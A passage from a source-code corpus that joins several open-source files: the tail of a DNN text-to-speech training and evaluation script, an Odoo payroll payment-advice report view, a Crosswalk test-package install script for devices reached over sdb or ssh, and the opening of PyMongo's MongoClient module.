normaliser.feature_normalisation(nn_cmp_file_list, nn_cmp_norm_file_list)
cmp_norm_info = numpy.concatenate((global_mean_vector, global_std_vector), axis=0)
elif cfg.output_feature_normalisation == 'MINMAX':
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim)
global_mean_vector = min_max_normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number])
global_std_vector = min_max_normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector)
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim, min_value = 0.01, max_value = 0.99)
min_max_normaliser.find_min_max_values(nn_cmp_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_cmp_file_list, nn_cmp_norm_file_list)
cmp_min_vector = min_max_normaliser.min_vector
cmp_max_vector = min_max_normaliser.max_vector
cmp_norm_info = numpy.concatenate((cmp_min_vector, cmp_max_vector), axis=0)
else:
logger.critical('Normalisation type %s is not supported!\n' %(cfg.output_feature_normalisation))
raise
cmp_norm_info = numpy.array(cmp_norm_info, 'float32')
fid = open(norm_info_file, 'wb')
cmp_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(cfg.output_feature_normalisation, norm_info_file))
# logger.debug(' value was\n%s' % cmp_norm_info)
feature_index = 0
for feature_name in list(cfg.out_dimension_dict.keys()):
feature_std_vector = numpy.array(global_std_vector[:,feature_index:feature_index+cfg.out_dimension_dict[feature_name]], 'float32')
fid = open(var_file_dict[feature_name], 'w')
feature_std_vector.tofile(fid)
fid.close()
logger.info('saved %s variance vector to %s' %(feature_name, var_file_dict[feature_name]))
# logger.debug(' value was\n%s' % feature_std_vector)
feature_index += cfg.out_dimension_dict[feature_name]
train_x_file_list = nn_label_norm_file_list[0:cfg.train_file_number]
train_y_file_list = nn_cmp_norm_file_list[0:cfg.train_file_number]
valid_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
valid_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
# we need to know the label dimension before training the DNN
# computing that requires us to look at the labels
#
# currently, there are two ways to do this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension
elif cfg.label_style == 'composed':
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension is %d' % lab_dim)
combined_model_arch = str(len(hidden_layers_sizes))
for hid_size in hidden_layers_sizes:
combined_model_arch += '_' + str(hid_size)
# nnets_file_name = '%s/%s_%s_%d.%d.%d.%d.%d.train.%d.model' \
# %(model_dir, cfg.model_type, cfg.combined_feature_name, int(cfg.multistream_switch),
# len(hidden_layers_sizes), hidden_layers_sizes[0],
# lab_dim, cfg.cmp_dim, cfg.train_file_number)
nnets_file_name = '%s/%s_%s_%d_%s_%d.%d.train.%d.model' \
%(model_dir, cfg.model_type, cfg.combined_feature_name, int(cfg.multistream_switch),
combined_model_arch, lab_dim, cfg.cmp_dim, cfg.train_file_number)
### DNN model training
if cfg.TRAINDNN:
logger.info('training DNN')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create model directory %s' % model_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
try:
if cfg.scheme == 'stagwise':
train_basic_DNN(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
train_DNN_with_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
infer_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
elif cfg.scheme == 'simultaneous':
train_DNN_and_traindev_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
else:
sys.exit('unknown scheme!')
# train_DNN(train_xy_file_list = (train_x_file_list, train_y_file_list), \
# valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
# nnets_file_name = nnets_file_name, \
# n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
# hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
# infer_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
# valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
# nnets_file_name = nnets_file_name, \
# n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
# hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
except KeyboardInterrupt:
logger.critical('train_DNN interrupted via keyboard')
# Could 'raise' the exception further, but that causes a deep traceback to be printed
# which we don't care about for a keyboard interrupt. So, just bail out immediately
sys.exit(1)
except:
logger.critical('train_DNN threw an exception')
raise
### generate parameters from DNN (with random token reps and inferred ones -- NOTOKENS & TOKENS)
temp_dir_name_NOTOKENS = '%s_%s_%d_%d_%d_%d_%d_%d_NOTOKENS' \
%(cfg.model_type, cfg.combined_feature_name, int(cfg.do_post_filtering), \
cfg.train_file_number, lab_dim, cfg.cmp_dim, \
len(hidden_layers_sizes), hidden_layers_sizes[0])
gen_dir_NOTOKENS = os.path.join(gen_dir, temp_dir_name_NOTOKENS)
temp_dir_name_TOKENS = '%s_%s_%d_%d_%d_%d_%d_%d_TOKENS' \
%(cfg.model_type, cfg.combined_feature_name, int(cfg.do_post_filtering), \
cfg.train_file_number, lab_dim, cfg.cmp_dim, \
len(hidden_layers_sizes), hidden_layers_sizes[0])
gen_dir_TOKENS = os.path.join(gen_dir, temp_dir_name_TOKENS)
gen_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.DNNGEN:
logger.info('generating from DNN')
try:
os.makedirs(gen_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create generation directory %s' % gen_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
## Without words embeddings:
gen_file_list_NOTOKENS = prepare_file_path_list(gen_file_id_list, gen_dir_NOTOKENS, cfg.cmp_ext)
dnn_generation(test_x_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list_NOTOKENS, cfg=cfg, use_word_projections=False)
## With word embeddings:
gen_file_list_TOKENS = prepare_file_path_list(gen_file_id_list, gen_dir_TOKENS, cfg.cmp_ext)
dnn_generation(test_x_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list_TOKENS, cfg=cfg, use_word_projections=True)
logger.debug('denormalising generated output using method %s' % cfg.output_feature_normalisation)
for gen_file_list in [gen_file_list_NOTOKENS, gen_file_list_TOKENS]:
fid = open(norm_info_file, 'rb')
cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
fid.close()
cmp_min_max = cmp_min_max.reshape((2, -1))
cmp_min_vector = cmp_min_max[0, ]
cmp_max_vector = cmp_min_max[1, ]
if cfg.output_feature_normalisation == 'MVN':
denormaliser = MeanVarianceNorm(feature_dimension = cfg.cmp_dim)
denormaliser.feature_denormalisation(gen_file_list, gen_file_list, cmp_min_vector, cmp_max_vector)
elif cfg.output_feature_normalisation == 'MINMAX':
denormaliser = MinMaxNormalisation(cfg.cmp_dim, min_value = 0.01, max_value = 0.99, min_vector = cmp_min_vector, max_vector = cmp_max_vector)
denormaliser.denormalise_data(gen_file_list, gen_file_list)
else:
logger.critical('denormalising method %s is not supported!\n' %(cfg.output_feature_normalisation))
raise
##perform MLPG to smooth parameter trajectory
## lf0 is included, the output features much have vuv.
generator = ParameterGeneration(gen_wav_features = cfg.gen_wav_features)
generator.acoustic_decomposition(gen_file_list, cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict, var_file_dict)
## osw: skip MLPG:
# split_cmp(gen_file_list, ['mgc', 'lf0', 'bap'], cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict)
### generate wav
if cfg.GENWAV:
logger.info('reconstructing waveform(s)')
for gen_dir in [gen_dir_NOTOKENS, gen_dir_TOKENS]:
generate_wav(gen_dir, gen_file_id_list, cfg) # generated speech
# generate_wav(nn_cmp_dir, gen_file_id_list) # reference copy synthesis speech
### evaluation: calculate distortion
if cfg.CALMCD:
logger.info('calculating MCD')
ref_data_dir = os.path.join(data_dir, 'ref_data')
ref_mgc_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.mgc_ext)
ref_bap_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.bap_ext)
ref_lf0_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.lf0_ext)
in_gen_label_align_file_list = in_label_align_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
calculator = IndividualDistortionComp()
spectral_distortion = 0.0
bap_mse = 0.0
f0_mse = 0.0
vuv_error = 0.0
valid_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_file_id_list = file_id_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.remove_silence_using_binary_labels:
## get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
## use first feature in label -- hardcoded for now
silence_feature = 0
## Use these to trim silence:
untrimmed_test_labels = binary_label_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if 'mgc' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_mgc_list, cfg.mgc_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.mgc_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_mgc_list)
valid_spectral_distortion = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
test_spectral_distortion = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
valid_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
test_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
if 'bap' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_bap_list, cfg.bap_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.bap_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_bap_list)
valid_bap_mse = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
test_bap_mse = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
valid_bap_mse = valid_bap_mse / 10.0 ##Cassia's bap is computed from 10*log|S(w)|. if use HTS/SPTK style, do the same as MGC
test_bap_mse = test_bap_mse / 10.0 ##Cassia's bap is computed from 10*log|S(w)|. if use HTS/SPTK style, do the same as MGC
if 'lf0' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_lf0_list, cfg.lf0_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.lf0_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_lf0_list)
valid_f0_mse, valid_vuv_error = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
test_f0_mse , test_vuv_error = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
logger.info('Develop: DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(valid_spectral_distortion, valid_bap_mse, valid_f0_mse, valid_vuv_error*100.))
logger.info('Test : DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(test_spectral_distortion , test_bap_mse , test_f0_mse , test_vuv_error*100.))
# this can be removed
#
if 0: #to calculate distortion of HMM baseline
hmm_gen_no_silence_dir = '/afs/inf.ed.ac.uk/group/project/dnn_tts/data/nick/nick_hmm_pf_2400_no_silence'
hmm_gen_dir = '/afs/inf.ed.ac.uk/group/project/dnn_tts/data/nick/nick_hmm_pf_2400'
if 1:
hmm_mgc_list = prepare_file_path_list(gen_file_id_list, hmm_gen_dir, cfg.mgc_ext)
hmm_bap_list = prepare_file_path_list(gen_file_id_list, hmm_gen_dir, cfg.bap_ext)
hmm_lf0_list = prepare_file_path_list(gen_file_id_list, hmm_gen_dir, cfg.lf0_ext)
hmm_mgc_no_silence_list = prepare_file_path_list(gen_file_id_list, hmm_gen_no_silence_dir, cfg.mgc_ext)
hmm_bap_no_silence_list = prepare_file_path_list(gen_file_id_list, hmm_gen_no_silence_dir, cfg.bap_ext)
hmm_lf0_no_silence_list = prepare_file_path_list(gen_file_id_list, hmm_gen_no_silence_dir, cfg.lf0_ext)
in_gen_label_align_file_list = in_label_align_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
remover = SilenceRemover(n_cmp = cfg.mgc_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(hmm_mgc_list, in_gen_label_align_file_list, hmm_mgc_no_silence_list)
remover = SilenceRemover(n_cmp = cfg.bap_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(hmm_bap_list, in_gen_label_align_file_list, hmm_bap_no_silence_list)
remover = SilenceRemover(n_cmp = cfg.lf0_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(hmm_lf0_list, in_gen_label_align_file_list, hmm_lf0_no_silence_list)
calculator = IndividualDistortionComp()
spectral_distortion = calculator.compute_distortion(valid_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.mgc_ext, cfg.mgc_dim)
bap_mse = calculator.compute_distortion(valid_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.bap_ext, cfg.bap_dim)
f0_mse, vuv_error = calculator.compute_distortion(valid_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.lf0_ext, cfg.lf0_dim)
spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0)
bap_mse = bap_mse / 10.0
logger.info('Develop: HMM -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' %(spectral_distortion, bap_mse, f0_mse, vuv_error*100.))
spectral_distortion = calculator.compute_distortion(test_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.mgc_ext, cfg.mgc_dim)
bap_mse = calculator.compute_distortion(test_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.bap_ext, cfg.bap_dim)
f0_mse, vuv_error = calculator.compute_distortion(test_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.lf0_ext, cfg.lf0_dim)
spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0)
bap_mse = bap_mse / 10.0
logger.info('Test : HMM -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' %(spectral_distortion, bap_mse, f0_mse, vuv_error*100.))
if __name__ == '__main__':
# these things should be done even before trying to parse the command line
# create a configuration instance
# and get a short name for this instance
cfg=configuration.cfg
# set up logging to use our custom class
logging.setLoggerClass(LoggerPlotter)
# get a logger for this main function
logger = logging.getLogger("main")
if len(sys.argv) != 2:
logger.critical('usage: run_dnn.sh [config file name]')
sys.exit(1)
config_file = sys.argv[1]
config_file = os.path.abspath(config_file)
cfg.configure(config_file)
if cfg.profile:
logger.info('profiling is activated')
import cProfile, pstats
cProfile.run('main_function(cfg)', 'mainstats')
# create a stream for the profiler to write to
profiling_output = io.StringIO()
p = pstats.Stats('mainstats', stream=profiling_output)
# print stats to that stream
# here we just report the top 10 functions, sorted by total amount of time spent in each
p.strip_dirs().sort_stats('tottime').print_stats(10)
# print the result to the log
logger.info('---Profiling result follows---\n%s' % profiling_output.getvalue() )
profiling_output.close()
logger.info('---End of profiling result---')
else:
main_function(cfg)
sys.exit(0)
| apache-2.0 |
Antiun/odoo | addons/l10n_in_hr_payroll/report/payment_advice_report.py | 340 | 3967 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
class payment_advice_report(osv.osv):
_name = "payment.advice.report"
_description = "Payment Advice Analysis"
_auto = False
_columns = {
'name':fields.char('Name', readonly=True),
'date': fields.date('Date', readonly=True,),
'year': fields.char('Year', size=4, readonly=True),
'month': fields.selection([('01', 'January'), ('02', 'February'), ('03', 'March'), ('04', 'April'),
('05', 'May'), ('06', 'June'), ('07', 'July'), ('08', 'August'), ('09', 'September'),
('10', 'October'), ('11', 'November'), ('12', 'December')], 'Month', readonly=True),
'day': fields.char('Day', size=128, readonly=True),
'state':fields.selection([
('draft', 'Draft'),
('confirm', 'Confirmed'),
('cancel', 'Cancelled'),
], 'Status', select=True, readonly=True),
'employee_id': fields.many2one('hr.employee', 'Employee', readonly=True),
'nbr': fields.integer('# Payment Lines', readonly=True),
'number':fields.char('Number', readonly=True),
'bysal': fields.float('By Salary', readonly=True),
'bank_id':fields.many2one('res.bank', 'Bank', readonly=True),
'company_id':fields.many2one('res.company', 'Company', readonly=True),
'cheque_nos':fields.char('Cheque Numbers', readonly=True),
'neft': fields.boolean('NEFT Transaction', readonly=True),
'ifsc_code': fields.char('IFSC Code', size=32, readonly=True),
'employee_bank_no': fields.char('Employee Bank Account', required=True),
}
def init(self, cr):
tools.drop_view_if_exists(cr, 'payment_advice_report')
cr.execute("""
create or replace view payment_advice_report as (
select
min(l.id) as id,
sum(l.bysal) as bysal,
p.name,
p.state,
p.date,
p.number,
p.company_id,
p.bank_id,
p.chaque_nos as cheque_nos,
p.neft,
l.employee_id,
l.ifsc_code,
l.name as employee_bank_no,
to_char(p.date, 'YYYY') as year,
to_char(p.date, 'MM') as month,
to_char(p.date, 'YYYY-MM-DD') as day,
1 as nbr
from
hr_payroll_advice as p
left join hr_payroll_advice_line as l on (p.id=l.advice_id)
where
l.employee_id IS NOT NULL
group by
p.number,p.name,p.date,p.state,p.company_id,p.bank_id,p.chaque_nos,p.neft,
l.employee_id,l.advice_id,l.bysal,l.ifsc_code, l.name
)
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
XiaosongWei/crosswalk-test-suite | webapi/tct-text-css3-tests/inst.wgt.py | 372 | 6809 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = ""
PKG_SRC_DIR = ""
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user)
return doCMD(cmd)
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
if line.find("[" + pkg_name + "]") != -1:
pkgidIndex = line.split().index("pkgid")
test_pkg_id = line.split()[pkgidIndex + 1].strip("[]")
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
if return_code != 0:
return True
else:
return False
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith(".wgt"):
if not doRemoteCopy(
os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
# Do some special copy/delete... steps
'''
(return_code, output) = doRemoteCMD(
"mkdir -p %s/tests" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
if not doRemoteCopy("specname/tests", "%s/tests" % PKG_SRC_DIR):
action_status = False
'''
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
global SRC_DIR, PKG_SRC_DIR
SRC_DIR = "/home/%s/content" % PARAMETERS.user
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0:
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket" % str(
userid)
else:
print "[Error] cmd commands error : %s" % str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause |
pdxwebdev/yadapy | yada/lib/python2.7/site-packages/pymongo/mongo_client.py | 5 | 53173 | # Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Tools for connecting to MongoDB.
.. seealso:: :doc:`/examples/high_availability` for examples of connecting
to replica sets or sets of mongos servers.
To get a :class:`~pymongo.database.Database` instance from a
:class:`MongoClient` use either dictionary-style or attribute-style
access:
.. doctest::
>>> from pymongo import MongoClient
>>> c = MongoClient()
>>> c.test_database
Database(MongoClient('localhost', 27017), u'test_database')
>>> c['test-database']
Database(MongoClient('localhost', 27017), u'test-database')
"""
import contextlib
import datetime
import threading
import warnings
import weakref
from collections import defaultdict
from bson.codec_options import DEFAULT_CODEC_OPTIONS
from bson.py3compat import (integer_types,
string_type)
from bson.son import SON
from pymongo import (common,
database,
helpers,
message,
periodic_executor,
uri_parser)
from pymongo.client_options import ClientOptions
from pymongo.cursor_manager import CursorManager
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidOperation,
InvalidURI,
NetworkTimeout,
NotMasterError,
OperationFailure)
from pymongo.read_preferences import ReadPreference
from pymongo.server_selectors import (writable_preferred_server_selector,
writable_server_selector)
from pymongo.server_type import SERVER_TYPE
from pymongo.topology import Topology
from pymongo.topology_description import TOPOLOGY_TYPE
from pymongo.settings import TopologySettings
from pymongo.write_concern import WriteConcern
class MongoClient(common.BaseObject):
HOST = "localhost"
PORT = 27017
# Define order to retrieve options from ClientOptions for __repr__.
# No host/port; these are retrieved from TopologySettings.
_constructor_args = ('document_class', 'tz_aware', 'connect')
def __init__(
self,
host=None,
port=None,
document_class=dict,
tz_aware=False,
connect=True,
**kwargs):
"""Client for a MongoDB instance, a replica set, or a set of mongoses.
The client object is thread-safe and has connection-pooling built in.
If an operation fails because of a network error,
:class:`~pymongo.errors.ConnectionFailure` is raised and the client
reconnects in the background. Application code should handle this
exception (recognizing that the operation failed) and then continue to
execute.
The `host` parameter can be a full `mongodb URI
<http://dochub.mongodb.org/core/connections>`_, in addition to
a simple hostname. It can also be a list of hostnames or
URIs. Any port specified in the host string(s) will override
the `port` parameter. If multiple mongodb URIs containing
database or auth information are passed, the last database,
username, and password present will be used. For username and
passwords reserved characters like ':', '/', '+' and '@' must be
escaped following RFC 2396.
.. warning:: When using PyMongo in a multiprocessing context, please
read :ref:`multiprocessing` first.
:Parameters:
